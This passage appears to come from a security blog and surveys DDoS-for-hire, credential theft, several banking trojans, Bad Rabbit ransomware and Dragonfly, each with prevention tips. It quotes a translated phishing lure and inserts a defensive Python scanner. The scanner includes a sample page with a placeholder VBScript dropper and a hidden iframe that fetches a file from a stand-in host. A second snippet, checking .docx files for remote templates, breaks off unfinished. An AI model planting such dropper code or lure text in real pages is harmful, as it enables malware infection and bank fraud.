Beware of DDoS-for-Hire
Distributed-denial-of-service (DDoS) attacks have become a public menace.
DDoS was once a tool used by hacktivists to further their social or political ends. In recent years, DDoS has become a tool for purely financial gain and for utter destruction. DDoS-for-hire services, also known as stressers or booters, have grown in recent years.
One DDoS-for-hire organization offers its DDoS service for a monthly fee of $7. A simple online search using the keyword “stressers” or “booters” will yield a number of organizations offering DDoS services for a fee. One DDoS mobile app even showed up on Google Play, but this one was immediately pulled.
Many of these DDoS-for-hire services openly advertise under the guise of offering a legitimate DDoS service. The reality is that it’s not illegal to conduct a DDoS attack or stress test on a website, for instance, to test the capacity of the site to receive a high volume of traffic or to test how to deflect an unwanted volume of traffic. The question of legitimacy comes down to whether or not the owner of the website authorizes the stress test.
According to the FBI, hiring a stresser or booter service to carry out a DDoS attack to take down a website is punishable under the US law called the “Computer Fraud and Abuse Act” and may result in any one or a combination of the following: seizure of computers and other electronic devices, arrest and criminal prosecution, a significant prison sentence, and a penalty or fine.
“Booter and stresser services are a form of DDoS-for-hire – advertised in forum communications and available on Dark Web marketplaces – offering malicious actors the ability to anonymously attack any Internet-connected target,” the FBI said. “These services are obtained through a monetary transaction, usually in the form of online payment services and virtual currency.”
What Can a DDoS-for-Hire Service Actually Do?
The Gammel case is the first Minnesota case to address the DDoS-for-hire cybercrime. In April of this year, in a criminal complaint filed before the US District Court of Minnesota, the Federal Bureau of Investigation (FBI) alleged that Gammel, a former employee of Washburn Computer Group – a Minnesota-based company – paid several DDoS-for-hire services to bring down 3 websites of Washburn in a more than one-year-long DDoS campaign.
According to the FBI, the first 2 websites of Washburn were knocked down several times as a result of the DDoS attacks paid for by Gammel. The FBI also alleged that the 3rd website – the one that replaced the 2 other sites of Washburn – was knocked down several times as well as a result of the DDoS orchestrated by Gammel. Washburn claimed that the DDoS attacks resulted in a minimum of $15,000 in losses.
In the criminal complaint, the FBI defined DDoS attack as "an attempt to make a machine or network resource unavailable to its intended users, such as by temporarily or indefinitely interrupting or suspending services of a host connected to the Internet, usually by shutting down a website or websites connected to target of the DDoS attack.”
The DDoS attacks against Dyn – a domain name service (DNS) provider on which many websites rely – were considered among the largest. Because of the DDoS attacks against Dyn, 80 widely used websites like Twitter, Amazon, Tumblr, Reddit, Spotify and Netflix were rendered temporarily inaccessible to the public.
“The [Dyn] attack used a booter service and was attributed to infected Internet of Things (IoT) devices like routers, digital video recorders, and Webcams/security cameras to execute the DDoS attack,” the FBI said.
According to the FBI source, the DNS provider lost approximately 8% of its customers following the DDoS attacks.
How a DDoS Attack Works
In the Dyn case, the company itself confirmed that the Mirai botnet was the primary source of the DDoS attacks, although it would not comment on the motivation or the identity of the attackers.
According to Dyn, on October 21, 2016, it observed a high volume of traffic on 2 occasions in its Managed DNS platform in the Asia Pacific, South America, Eastern Europe and US-West regions. The company said that the 2 major DDoS attacks on its Managed DNS platform involved 100,000 compromised IoT devices originating from different parts of the globe that were infected by the Mirai botnet.
The Mirai botnet works by infecting IoT devices with weak security – those that use default usernames and passwords – and turning them into bots or robots that can be ordered around, in this case, to conduct DDoS attacks.
The effects of malicious and unauthorized DDoS attacks are immediate. They render targeted websites inaccessible or slow. As experienced by Washburn and Dyn, DDoS attacks proved to be costly and can cause businesses to lose customers.
Availability of DDoS Tools
The danger of DDoS attacks is that the tools for this cybermenace aren’t just available from the DDoS-for-hire services themselves but from public sources. For instance, one can conduct a DDoS attack on his or her own using the Mirai botnet, since its source code was made available to the public in September of this year by someone who calls himself or herself “Anna-senpai”.
DDoS tools are also evolving. Just days after the online publication of the Mirai source code, a new DDoS tool called “Reaper” emerged. This DDoS tool hasn’t launched an attack yet as it’s still in the process of infecting vulnerable IoT devices. The stark difference between the 2 DDoS tools is that while Mirai infected 100,000 IoT devices, Reaper has infected over half a million IoT devices. This means that this new botnet is much more powerful.
While it’s cheap to hire malicious cyberactors to conduct DDoS attacks, it’s equally affordable to hire professionals to prevent DDoS attacks. Contact us today if your company is currently burdened by this cybermenace or if your organization simply wants to be proactive in stopping DDoS attacks.
How to Prevent Account Takeover or Hijacking
A new study conducted by Google and the University of California (UC) delved into the question of which among these three cyberattacks – phishing, keylogging and third-party data breach – is most likely to result in account takeover or hijacking.
From March 2016 to March 2017, researchers at Google and UC examined 12.4 million potential victims of phishing kits, 788,000 potential victims of keyloggers and 1.9 billion usernames and passwords exposed via third-party data breaches traded on the black market.
The Google and UC study found that victims of phishing kits are more likely to have their account taken over by cybercriminals as these kits harvest the same information that Google uses in verifying every time a user logs into his or her email account. Details that are harvested by phishing kits include the victim's secret questions, geolocation, phone numbers and device identifiers.
The study found that accounts of victims of phishing are 400 times more likely to be successfully hijacked compared to a random Google user. The likelihood of account takeover is far lower for keylogger victims (40 times more likely to be hijacked) and third-party data breach victims (10 times). Researchers found 25,000 blackhat tools used for phishing and keylogging.
“We find that the risk of a full email takeover depends significantly on how attackers first acquire a victim’s (re-used) credentials,” the researchers wrote in their paper “Data Breaches, Phishing, or Malware? Understanding the Risks of Stolen Credentials”. “Using Google as a case study, we observe only 7% of victims in third party data breaches have their current Google password exposed, compared to 12% of keylogger victims and 25% of phishing victims.”
Once an account is taken over, the attacker can download all of the victim’s private data; remotely wipe the victim’s data and backups; impersonate the victim; reset the victim’s passwords and use this hijacked account as a stepping stone to access the victim’s other online accounts.
Third-Party Data Breach
Most of the 1.9 billion usernames and passwords exposed via third-party data breaches in the Google and UC study came from MySpace, Badoo, Adobe, LinkedIn, VK, Tumblr and Dropbox. The study revealed that the passwords listed below are the most commonly used passwords by victims of phishing, keylogging and third-party data breach:
These data leaks, which date back to 2012–2014, appeared in public blackhat forums, paste sites and sites like leakedsources.com, leakbase.pw and breachalarm.com – sites that charge those who would like to find out if their accounts are compromised. Victims of third-party data breach were mostly from the US (39%), India (8%) and Brazil (2.6%).
The importance of an account, in particular an email address and its login details, can’t be overstated. “As the digital footprint of Internet users expands to encompass social networks, financial records, and data stored in the cloud, often a single account underpins the security of this entire identity – an email address,” the researchers said.
The phishing kit referred to in the Google and UC study is a prepackaged fake login page for a popular site like Gmail, Yahoo or online banking. Phishing kits are often uploaded to compromised websites and automatically harvest the credentials of victims. Researchers found that phishing kit variants were uploaded as fake login pages for Yahoo, Hotmail, Gmail, Workspace Webmail, Dropbox, Google Drive, Docusign, ZoomInfo, Office 365 and AOL.
The study showed that the most popular phishing kit that utilized fake login pages for popular email providers – Yahoo, Hotmail, AOL and Gmail – generated 1,448,890 stolen credentials. Based on the last sign-in to email accounts receiving stolen credentials, the top 3 phishing kit users are those from Nigeria (41%), United States (11%) and Morocco (7.6%). Victims of phishing were mostly from the US (50%), South Africa (4%) and Canada (3%).
Google in a blog post said, “By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.”
Of the three forms of cyberattacks – phishing, keylogging and third-party data breach – phishing is the most destructive as it doesn’t only yield a password, but also other sensitive data that Google itself may ask for when verifying an account holder, such as IP address, location, phone numbers and device model.
A keylogger is malicious software that tracks and records every keystroke entry you make on your computer, often without your knowledge or permission. Attackers use keyloggers to capture sensitive data like financial information or passwords, which are then sent to third parties for criminal use. Keyloggers can steal your on-device passwords, harvest clipboard content, screenshot your online activities and monitor your keystrokes.
Based on the study, the top 10 keylogger families are the following: HawkEye, Cyborg Logger, Predator Pain, Limitless Stealer, iSpy Keylogger, Olympic Vision, Unknown Logger, Saint Andrew’s, Infinity Logger and Redpill Spy. HawkEye, in particular, sent over 400,000 snooping reports to 470 emails believed to be managed by attackers.
The top keylogger users based on the last sign-in to email accounts receiving stolen credentials came from Nigeria (11%), Brazil (7.8%) and Senegal (7.3%). Victims of keyloggers were mostly from Brazil (18%), India (10%) and US (8%).
Here are some of the ways to stop account takeover or hijacking:
Attackers already know our “1234567” and “password” passwords. It’s time to use less obvious passwords. Cybersecurity, however, needs to move beyond strong passwords.
To ward off attackers, many online businesses today safeguard their accounts through two-factor authentication. Two-factor authentication is when you use something you know, for example a password, and also something you have, for example a smartphone, whereby after entering your password, you either receive an SMS with an additional code, or use an app to get the code to finalize the logon process. In addition, some online software providers and social networks already enforce a multi-step authentication. For instance, when Google detects that you logged into your account from a different device or a different location, it will ask for additional information only you would know before granting access.
As shown by the destructive nature of phishing, even two-factor authentication isn’t enough to ward off attackers, as they can harvest the sensitive information that Google itself may require when verifying an account.
Contact us today to learn more about how to protect your enterprise accounts from takeover or hijacking.
New Marcher Malware Victimized Android Users in a 3-in-1 Scheme
Attackers today are taking their time to get what they want. Researchers at Proofpoint revealed that a threat actor, or actors, has since the early part of this year been siphoning bank details from victims in a prolonged attack dubbed by some as the “triple threat”.
According to Proofpoint, the threat actor since January of this year has been targeting customers of Bank Austria, Raiffeisen Meine Bank and Sparkasse Bank by employing three hacking tactics. The description below shows how personal and bank details of nearly 20,000 bank customers in Austria were stolen by the threat actor using these three hacking tactics: malicious emails, malicious websites and malicious software.
Step 1: Malicious Email
The threat actor’s point of entry in attacking the victim is through a malicious email. When this email is opened by the victim using an Android phone, the victim is exposed to a malicious link. The email link is a bit.ly shortened link, aimed at evading detection.
Step 2: Malicious Site
Once the malicious link is clicked, the victim is redirected to a phishing site – a fake site that copies the layout and content of a landing page of a bank – that asks for an account number and PIN. The image below is an example of the phishing site that copies branding from Bank Austria.
The URL addresses of the phishing sites contain the word "bankaustria", fooling victims into thinking that they're inside the real Bank Austria website. Here are some of the malicious URL addresses:
Once the victim enters his or her banking account information on the fake landing page, he or she is then directed to a page that asks for an email address and phone number. Below is a sample of the page that asks for the email address and phone number.
Step 3: Marcher Malware Infection
Once the attacker has siphoned the banking and personal information of the victim, the victim is then asked to download a fake mobile app of the targeted bank. The message below is shown to the victim.
Proofpoint provides the following translation for the message above.
***Start of Translation***
The system has detected that the Bank Austria Security App is not installed on your smartphone. Due to new EU money laundering guidelines, the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system.
Please install the app immediately to avoid blocking your account.
Follow the instructions at the bottom of this page.
Why you need the Bank Austria Security App:
Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted.
Our security app allows us to transmit this sensitive data encrypted to you, thus increasing the security that you will not suffer any financial loss.
Step 1: Download Bank Austria Security App
Download the Bank Austria security app to your Android device. To do this, open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code.
After this message, the victim is then shown additional instructions for installing the bank's fake mobile app. Below is the screencap of the additional instructions and the corresponding translation by Proofpoint.
***Start of Translation***
Step 2: Allow installation
Open your device's settings, select Security or Applications (depending on the device), and check Unknown sources.
Step 3: Run installation
Start the Bank Austria security app from the notifications or your download folder, tap Install.
After successful installation, tap Open and enable the device administrator. Finished!
Once the fake app is installed on the victim's Android phone, the bank's icon can be seen on the home screen of the victim's phone. When the app is used for the first time, the victim is asked to provide his or her credit card number and other personally identifiable information, such as date of birth, address, phone number, password, purportedly for authentication.
From the malicious email to the malicious sites and the fake bank app, the real bank’s branding is copied, causing the victims to drop their guard. Victims believed that they had downloaded the real mobile app of their bank. They instead downloaded the new version of the malicious software (malware) called “Android.Fakebank.B”, also known as Marcher.
Marcher malware is an Android-specific malicious software. It was first observed in the wild in October 2013. An older version of Marcher malware came with a call-barring functionality. This functionality was aimed at stopping customers of South Korean and Russian banks from canceling their payment cards that the Marcher malware itself stole. Once installed, this particular version of Marcher malware registers a BroadcastReceiver component that’s triggered every time the victim tries to make an outgoing call. The malware automatically cancels the call once it determines that the victim is calling any of the customer service call centers of the target banks.
Another version of the Marcher malware came with a text message spoofing functionality. Once installed into the victim’s Android phone, this specific Marcher malware spoofs a text message from the targeted bank asking the user to verify a fraudulent transaction. This tricks the victim into logging into a fake mobile app of a bank.
How to Prevent Marcher Malware Attacks
“As on the desktop, mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites,” researchers at Proofpoint said. “Unusual domains, the use of URL shorteners, and solicitations that do not come from verifiable sources are also red flags for potential phishing and malware.
Here are some additional tips to further protect your Android phone from Marcher malware:
Hackers Use Google Search Results to Spread Malware
Cybercriminals are continually finding new ways to distribute their malicious software. This time, they took advantage of Google search results in spreading their malware.
Researchers at Cisco discovered that Google search results are being used by cybercriminals for spreading their malware. Cybercriminals took advantage of the links provided by Google search results in spreading the new version of the banking malware dubbed as “Zeus Panda”, also known as “Panda Banker”.
Google search is the digital world’s go-to place whenever we want to know something. Google answers our questions by providing links that it believes (based on its algorithm or criteria) are the best responses to our queries.
Billions of people around the world are using Google search. According to StatCounter, a Dublin-based web tracking service, as of October 2017, Google received the bulk of the search engine market share worldwide (91.47%), followed by Bing (2.75%), Yahoo (2.25%) and Baidu (1.8%).
Zeus Panda, the malware distributed by the threat actors via malicious links on Google search, is a malware that borrows some of the code of another malware called “Zeus” – a malware that first appeared in 2007. Cybercriminals have since earned hundreds of millions of dollars using the Zeus malware by stealing banking credentials and generating fraudulent banking transactions.
How Zeus Panda Spreads via Google Search Results
In order that these malicious links show up on the first page of Google search results, threat actors used the process called “SEO”, short for search engine optimization. Google, for its part, allows legitimate SEO – referred to as "whitehat" SEO. One of the legitimate SEO techniques used by the threat actors is the use of targeted banking-related keywords to zero in on their target victims.
“By targeting primarily financial-related keyword searches and ensuring that their malicious results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc.,” Cisco researchers said.
Threat actors, for instance, used the banking related keywords "al rajhi bank working hours during ramadan". The screencap below from Cisco researchers shows one of the top links in the Google search results for the above-mentioned keywords.
Below are the other keywords used by the threat actors:
"nordea sweden bank account number"
"how many digits in karur vysya bank account number"
"how to cancel a cheque commonwealth bank"
"salary slip format in excel with formula free download"
"bank of baroda account balance check"
"bank guarantee format mt760"
"sbi bank recurring deposit form"
"axis bank mobile banking download link"
As can be gleaned from the above-mentioned keywords, certain geographic regions appear to be directly targeted, with many of these keywords targeting users searching for financial institutions in India as well as the Middle East. The threat actors compromised business websites that had received a high number of reviews and high ratings, so as to appear legitimate to victims. Once a victim clicks on one of these compromised links, a multi-stage malware infection process is initiated.
As shown below, the victim is redirected to a compromised site that shows a fake alert from Windows Defender that the Zeus virus is detected.
Once the victim clicks the “OK” button, the victim is once again redirected to another compromised site which hosts a malicious Word document as shown below.
Clicking "Enable Editing" and then "Enable Content" will initiate the download of the new version of the Zeus Panda malware onto the victim's computer.
This new version of Zeus Panda shares many characteristics with its predecessor Zeus Panda. Both borrowed code from the Zeus malware – the creator of which released the source code to the public in 2011. Both are designed to steal banking and other sensitive credentials and conduct fraudulent banking transactions.
Zeus Panda malware was first discovered by the researcher only known as “Fox IT” in February 2016. As reported by Proofpoint, this early version of Zeus Panda stole banking credentials of customers from European and Australian banks, UK online casinos and international online payment systems.
Unlike the new version of the malware which uses Google search results to spread the malware, the older version of Zeus Panda was spread using malicious email attachments, malicious email links and web injects.
In August 2016, Proofpoint found that millions of emails were sent to organizations involved in manufacturing, retail, insurance and related sectors. The email messages, masquerading as coming from legitimate banks, contained malicious links leading to Microsoft Word documents. These documents contain macros which, if enabled, download the Zeus Panda malware.
In October of this year, IBM reported that customers in North America were targeted by the Zeus Panda malware. For this October 2017 campaign, IBM said, the threat actors distributed the malware via malicious emails purporting to come from courier services like UPS. These fake emails, according to IBM, contain embedded links that lead the recipient to a site infected by Zeus Panda malware.
According to Proofpoint, the early version of Zeus Panda was also spread using web injects – a process by which cybercriminals intercept online banking traffic and modify banking sites on infected computers in order to carry out man-in-the-browser (MITB) attacks. In carrying out MITB attacks, threat actors infect a web browser to modify web pages of banks, online casinos and international online payment systems and modify the transaction content.
How to Prevent Zeus Panda Attacks
In order to prevent being a victim of the Zeus Panda malware, it’s important to think twice before clicking anything online and opening an email attachment. As shown by the new version of Zeus Panda, it’s important to remain discerning and vigilant in the results of a Google search.
Cisco researchers who discovered the new version of Zeus Panda said, “Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape.”
Ramnit Malware Makes a Comeback via Google Play
Ramnit, the once notorious malware that infected 3.2 million computers around the world, has resurfaced via infected apps on Google Play.
Symantec researchers found 92 distinct apps on Google Play with a total of 250,000 downloads laden with Ramnit malware. Some of the Ramnit-infected apps that turned up on Google Play were educational and tutorial apps.
Symantec informed Google of the presence of these infected apps and the company has removed them from the app store. This isn’t the first time that Ramnit-infected apps have turned up on Google Play. In March of this year, more than 100 Ramnit-infected apps were similarly removed from Google Play.
Ramnit first appeared in the wild in 2010. In February 2015, a law enforcement operation led by the European Union Agency for Law Enforcement Cooperation (Europol) crippled the operation of the cybercrime group behind Ramnit by shutting down the command and control servers, as well as 300 internet domain addresses used by the group. At the time, the group had already infected 3.2 million computers in total and defrauded an undetermined but large number of victims.
The law enforcement operation against the group behind Ramnit involved investigators from Germany, Italy, the Netherlands and the UK. Representatives from private industry like Symantec and Microsoft were also involved in the law enforcement operation.
Ramnit is a multi-feature cybercrime tool. It compromised a victim in the following manner:
This malware monitors web browsing activities and detects when certain websites like online banking sites are visited. Ramnit can inject itself into the web browser and alter the website of the bank to make it appear that the bank is asking the user for additional information like credit card details.
This malware can hijack online banking sessions. Ramnit attackers achieve this by stealing session cookies from web browsers and by using the stolen cookies to impersonate victims to authenticate themselves on websites.
This malware scans the computer’s hard drive. It’s configured in such a way as to search for specific folders that are considered likely to contain sensitive information like passwords.
This malware can gain remote access – upload, download, or delete files and execute commands – on the victim’s computer in two ways: by connecting to an anonymous FTP server and via a Virtual Network Computing (VNC) module.
Ramnit is a persistent cyber threat. The malware’s creators made sure that once a computer is infected it’ll be difficult to remove the malware from the compromised computer.
Once the malware is installed on the compromised computer, it copies itself to the computer’s memory, hard drive and removable drive. The malware’s version that’s copied to the computer’s memory checks the hard disk-based copy of the malware. If the memory-based copy of the malware detects that the hard disk-based copy has been quarantined or removed, it’ll create another malware copy for the hard disk to sustain the infection.
Microsoft describes Ramnit malware this way: "This malware family steals your sensitive information, such as your bank user names and passwords. It can also give a malicious hacker access and control of your PC, and stop your security software from running."
How Ramnit Spreads
While the latest method of propagation of Ramnit is via Android apps, this doesn’t, however, mean that this malware works with Android devices. Since its appearance in 2010, this malware has always been a threat to computers using Windows as an operating system.
Ramnit won’t run on your Android device even if you’ve had the misfortune of downloading a Ramnit-infected app from Google Play. In order for the Windows infection to happen, an Android device loaded with a Ramnit-infected app has to be connected to a Windows computer. Once the malware has compromised a Windows computer, it searches for all .exe, .dll, .htm, and .html files on any removable drives like USB drives and on the local hard disk and infects them by making copies of itself.
“The HTML file infection process uses two tactics: injecting VBScript code into an HTML page that drops and executes the worm, and also injecting a hidden iframe into HTML files that downloads a remote file if the page is opened in a browser,” Symantec said.
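The two HTML infection markers Symantec describes (an injected VBScript dropper block and a hidden iframe that loads a remote file) can be flagged with a simple file scanner. The example below is added here and is not Symantec's or the author's code; the indicator patterns and the sample pages are constructed assumptions for illustration, not real Ramnit content.

```python
"""Heuristic scanner for HTML files carrying a Ramnit-style injection.

Two markers, as described in the text above:
  1. a <script> block in VBScript that uses file-system/shell objects (dropper)
  2. an <iframe> sized to zero or styled invisible that pulls a remote file
Assumption: these regexes are generic indicators, not Ramnit signatures.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Opening <script> tag whose language/type attribute declares VBScript.
VBSCRIPT_RE = re.compile(
    r'<script[^>]*\b(?:language|type)\s*=\s*["\']?(?:vbscript|text/vbscript)',
    re.I)
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.I)
# Attributes that make an iframe effectively invisible to the user.
HIDDEN_ATTR_RE = re.compile(
    r'(?:\bwidth\s*=\s*["\']?0\b|\bheight\s*=\s*["\']?0\b'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)', re.I)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# Objects a VBScript dropper typically needs to write and run a file.
DROPPER_HINTS_RE = re.compile(
    r'(?:WScript\.Shell|Scripting\.FileSystemObject|CreateObject|ADODB\.Stream|\.Run\b)',
    re.I)


def scan_html(text: str) -> Dict[str, object]:
    """Return {'suspicious': bool, 'findings': [...]} for one HTML document."""
    findings: List[Dict[str, object]] = []
    for m in VBSCRIPT_RE.finditer(text):
        end = text.lower().find('</script>', m.end())
        body = text[m.end():end if end != -1 else len(text)]
        hints = sorted({h.group(0) for h in DROPPER_HINTS_RE.finditer(body)})
        findings.append({'kind': 'vbscript', 'dropper_hints': hints})
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if HIDDEN_ATTR_RE.search(tag):
            src = SRC_RE.search(tag)
            findings.append({'kind': 'hidden_iframe',
                             'src': src.group(1) if src else None})
    return {'suspicious': bool(findings), 'findings': findings}


def scan_tree(root: Path, exts=('.htm', '.html')) -> List[Dict[str, object]]:
    """Walk a directory (e.g. a mounted removable drive) and report hits."""
    hits = []
    for path in sorted(root.rglob('*')):
        if path.is_file() and path.suffix.lower() in exts:
            result = scan_html(path.read_text(errors='replace'))
            if result['suspicious']:
                hits.append({'path': str(path), **result})
    return hits


# Constructed sample pages (not real infected files).
CLEAN_PAGE = """<html><body>
<script type="text/javascript">document.title = 'ok';</script>
<iframe src="https://example.invalid/video" width="640" height="360"></iframe>
</body></html>"""

INFECTED_PAGE = """<html><body><p>Welcome</p>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A0000PLACEHOLDERHEX"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropFileName
--></SCRIPT>
<iframe src="http://example.invalid/dropper.html" width="0" height="0" style="display:none"></iframe>
</body></html>"""


def demo() -> List[Dict[str, object]]:
    """Write the samples to a temp directory and scan it like a drive."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / 'clean.html').write_text(CLEAN_PAGE)
        (root / 'infected.htm').write_text(INFECTED_PAGE)
        (root / 'notes.txt').write_text('not html')
        return scan_tree(root)


if __name__ == '__main__':
    for hit in demo():
        print(hit['path'])
        for f in hit['findings']:
            print('  ', f)
```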
Ramnit malware is one of the reasons why it’s unsafe to use or borrow another person’s removable drive or USB flash drive. You never know; this USB drive may be laden with the Ramnit malware.
In addition to propagating the malware through infected apps and through infected removable drives, Ramnit attackers also spread the malware through malicious emails and exploit kits served through malicious advertisements on social media pages and websites. Public FTP servers are also used by Ramnit attackers to distribute the malware. Europol considers Ramnit a botnet.
“This botnet – a term used to describe a network of infected computers - was used by the criminals running it to gain remote access and control of the infected computers, enabling them to steal personal and banking information, namely passwords, and disable antivirus protection,” Europol said. “This malware, infecting users running Windows operating systems, explored different infection vectors such as links contained in spam emails or by visiting infected websites.”
"Despite the setback many years ago, Ramnit’s operators have not completely gone away and there also seem to be many latent infections worldwide,” Symantec said. “We know that Google has a system in place for vetting uploaded apps, but we don’t have visibility into the processes for vetting submitted apps, so we can’t say for sure why these infected apps are getting through the vetting process.”
How to Prevent Ramnit Attacks
According to Microsoft, Windows Defender Antivirus detects and removes Ramnit malware.
Here are additional tips for preventing Ramnit attacks:
Bad Rabbit Ransomware, New Variant of NotPetya, Is Spreading
Bad Rabbit ransomware, a new variant of NotPetya, is spreading across Eastern Europe and other parts of the world.
According to the Russian News Agency TASS, Bad Rabbit ransomware attacked the Russian mass media and Ukraine’s airport and subway. Symantec reported that Bad Rabbit primarily attacked Russia (86%), followed by Japan (3%), Bulgaria (2%), Ukraine (1%), US (1%) and all other countries (7%).
NotPetya versus Bad Rabbit
NotPetya is a malicious software (malware) that was released into the wild in June of this year. It wreaked havoc on thousands of computers worldwide, in countries including Belgium, Brazil, Germany, Russia and the US. Merck, Nuance Communications and FedEx are some of the victims of NotPetya.
Similar to NotPetya, users of computers infected by Bad Rabbit received a notice that their files are encrypted. Both malware have the same style of ransom note, telling victims to pay a certain amount to regain access to their files. Both are worms, which means that they have the ability to self-propagate – self-reproduce by infecting other computers in the network.
One stark difference between NotPetya and Bad Rabbit is the use of self-propagation tools. While NotPetya self-propagates using EternalBlue and EternalRomance, Bad Rabbit self-propagates by only using EternalRomance.
EternalBlue and EternalRomance are just two of the many exploits released in April of this year by the group called “Shadow Brokers”. The group claimed that EternalBlue, EternalRomance and the other hacking tools they’ve released were used by the National Security Agency (NSA) in exploiting the vulnerabilities in Windows operating system. According to Microsoft, it released a security update or patch dated March 17, 2017, fixing the vulnerabilities exposed by Shadow Brokers.
The second difference between NotPetya and Bad Rabbit is that NotPetya is a “wiper” rather than a ransomware. A wiper’s aim is to wipe out or delete all computer files for good, while ransomware’s aim is to generate money from victims. None of the victims of NotPetya were able to unlock their encrypted files. According to Symantec, its analysis of Bad Rabbit confirms that it’s not a wiper as the encrypted files can be recovered if the key is known.
How Bad Rabbit Works
Bad Rabbit infects victims’ computers in the following manner:
The first contact of victims of Bad Rabbit is via watering holes – legitimate websites that are altered by cybercriminals. Bad Rabbit compromised many popular websites in the affected countries.
Once a victim visits one of these compromised sites, Bad Rabbit malware is dropped or downloaded into the victim's computer as a fake software update to Adobe Flash Player.
Bad Rabbit malware masquerading as an update to Flash Player enters the victim’s computer by employing social engineering – convincing the victim that there’s a need to update his or her Flash Player. In the middle of the computer screen, a popup shows up asking the user to download an update for Flash Player.
Once the fake Adobe Flash Player "Install" button is clicked, the Bad Rabbit malware drops the five open-source tools described below onto the victim’s computer. According to Symantec, the download originates from a particular domain. It’s possible, though, that victims may have been redirected there from other compromised sites, Symantec said.
Mimikatz is an open-source tool used for manipulating privileges and recovering Windows passwords in plaintext.
In addition to Mimikatz, Bad Rabbit also uses a hardcoded list of commonly used default passwords in attempting to guess Windows passwords.
ReactOS is an open-source operating system used as an alternative to Windows. The use of ReactOS, according to Symantec, reduces the amount of detectable suspicious activity on an infected computer.
DiskCryptor is an open-source disk encryption tool. After individual files on the victim’s computer are encrypted, Bad Rabbit then performs full disk encryption. Once the system is restarted, a ransom note is displayed, demanding a ransom of 0.05 Bitcoin (US$280).
Bad Rabbit spreads to other vulnerable computers on the network using EternalRomance, an exploit that bypasses security in Server Message Block (SMB), the transport protocol that Windows computers use for a variety of purposes, including file sharing, printer sharing and access to remote Windows services.
According to researchers at RiskIQ, long before the distribution of Bad Rabbit ransomware last October 24th, cyber attackers had already compromised the affected websites used as watering holes. The researchers said that they “can track the distribution vector back to early 2016 showing that victims were compromised long before the ransomware struck.”
"The thing we do not understand at this point is why they decided to burn this information position to mass distribute the Bad Rabbit ransomware rather than save it for another type of malware," RiskIQ researchers said.
How to Prevent Bad Rabbit Attacks
As Bad Rabbit uses factory or default passwords, it’s important to protect your computer with a strong password. This security measure, however, isn’t enough to protect you from Bad Rabbit.
Bad Rabbit self-propagates by using the hacking tool EternalRomance. A security update or patch that stops EternalRomance has already been made available by Microsoft since March 17, 2017.
"Using unpatched and unsupported software may increase the risk of proliferation of cybersecurity threats, such as ransomware,"
In an effort to keep all your software up to date, be careful, though, not to fall into the trap of fake updates.
Fake Adobe Flash Player updates have long been a favorite of cyber criminals, who keep finding security vulnerabilities in this software. If an update prompt pops up on your monitor, don’t click the button; visit the official Adobe website for updates instead.
Cyber Espionage Group Targets Critical Infrastructure Using Old Hacking Tactics
Cyberattacks against critical infrastructure – energy, nuclear, water, aviation and critical manufacturing sectors – in the US have been going on since May 2017, the US Computer Emergency Readiness Team (US-CERT) said in a rare technical alert notice.
Symantec, on the other hand, reported that cyberattacks against the energy infrastructure in some European countries and in the US have been underway since December 2015. Cisco researchers, meanwhile, reported that since at least May 2017, they have observed attackers targeting critical infrastructure and energy companies around the world, in particular, Europe and the US.
While US-CERT and Cisco didn’t name a particular group responsible for the ongoing cyberattacks against critical infrastructure, Symantec identifies the threat actors collectively known as “Dragonfly” as the group behind the cyberattacks against the energy sector. Symantec researchers said the group has been in operation since at least 2011.
Symantec dubbed Dragonfly’s latest campaign against the energy sector “Dragonfly 2.0”. The campaign started in late 2015; its most notable cyberattack was the attack against Ukraine’s power system in 2015 and 2016, which resulted in power outages affecting hundreds of thousands of residents.
The US-CERT technical alert – the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) – and the reports from Symantec and Cisco showed that the threat group has been employing old hacking tactics.
Methods of Cyber Attacks
1. Malicious Emails
According to US-CERT, the threat group used malicious emails or phishing emails with the subject line such as “AGREEMENT & Confidential”. The group also used malicious Microsoft Word attachments that appear to be legitimate invitations, policy documents or curricula vitae for industrial control systems personnel to lure users to open the attachment, US-CERT said.
According to Symantec, one example of the malicious email campaign used by the threat group were emails disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.
Cisco researchers identified an email-based attack called "Phishery", targeting the energy sector, including nuclear power. Phishery became publicly available on GitHub in late 2016.
“Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code,” Cisco researchers said. “In this case, there is no malicious code in the attachment itself. The attachment instead tries to download a template file over an SMB connection so that the user's credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim's computer.”
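The template-over-SMB trick Cisco describes can be checked for before a document is opened: a .docx is a zip archive, and an attached template is declared as an external relationship in word/_rels/settings.xml.rels. The following is an added example (not Cisco's or the page's own code) that flags a template target pointing off the local machine; the host names in it are placeholders, and the sample document is constructed in memory.

```python
"""Check a .docx for a remote attached template (the Phishery-style lure above).
Added example; the host names below are placeholders, not indicators."""
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

RELS_PATH = "word/_rels/settings.xml.rels"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# A UNC path (\\host\share), an http(s) URL, or file:// with a host name makes
# Word fetch the template over the network; file:///C:/... stays on local disk.
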